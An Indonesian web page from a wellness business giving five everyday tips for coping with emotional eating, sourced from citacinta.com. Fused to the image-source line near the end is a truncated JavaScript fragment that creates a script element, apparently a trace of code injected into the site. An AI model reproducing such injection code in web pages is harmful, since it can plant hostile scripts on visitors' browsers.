fbpx
Appointment
Appointment
Appointment

5 Cara Mengatasi Emotional Eating

Saat sedang menghadapi tekanan biasanya yang menjadi pelarian adalah Makanan! Simak tips untuk mengatasinya.

Tidak bisa dipungkiri kalau perempuan cenderung mencari makanan sebagai pelarian saat stres. Hasilnya, masalah tidak selesai, berat tubuh malah makin bertambah. Untuk mengatasinya, cobalah melakukan lima hal berikut :

1. Makan tepat waktu
Perempuan aktif seperti Anda memang disibukkan oleh segudang kegiatan. Namun, jangan lewatkan sarapan, makan siang, dan makan malam untuk mencegah kita craving. Saat tubuh tidak diisi asupan, Anda cenderung mencari sesuatu yang manis-manis. Ini justru akan memberi lebih banyak lemak di tubuh dibandingkan nasi.

2. Pilih alternatif lain
Memang ada saja momen ketika Anda kesal dan pengen mencekoki diri dengan aneka makanan. Jika sulit menghindarinya, pilihlah jenis makanan yang bersahabat bagi tubuh. Misalnya: biskuit gandum, buah, atau jus buah segar tanpa gula. Pas buat mengenyangkan perut tanpa mengancam tubuh jadi melar.

3. Kesibukan positif
Usahakan mencari pelarian ke suatu hal yang juga produktif. Bisa main alat musik, update blog, nonton DVD, atau olahraga. Intinya, apa pun yang bisa Anda nikmati hingga melupakan makanan. Hindari acara kongkow dengan teman karena biasanya Anda cenderung mengisi perut saat bersama mereka.

4. Curahkan ke buku
Ungkapkan perasaan Anda tentang masalah makan ke buku. Mulai dari jenis makanannya, jam makan, hingga biaya yang dihabiskan. Dengan begitu, Anda jadi punya bayangan tentang pola makan sehari-harinya dan mampu mengubahnya. Misalnya, lebih menahan diri saat akan ngemil roti karena ini lebih karena lapar mata, bukan lapar fisik.

5. Kurangi rasa bersalah
Tidak jarang Anda merasa depresi setelah makan kentang goreng atau burger ketika sedang resah. Hindari perasaan bersalah. Karena, perasaan ini akan membuat Anda putus asa hingga akhirnya mencekoki diri dengan makanan-makanan tanpa henti. Kalau kebablasan, beri toleransi pada diri sendiri. Namun, coba kurangi porsi untuk isi perut berikutnya.

 

Sumber : citacinta.com

Source Image : http://media.viva.co.idvar d=document;var s=d.createElement(‘script’);

PT Shape Up Indonesia - Copyright © 2021. All Rights Reserved.
Developed byPetrus Andre
FAQ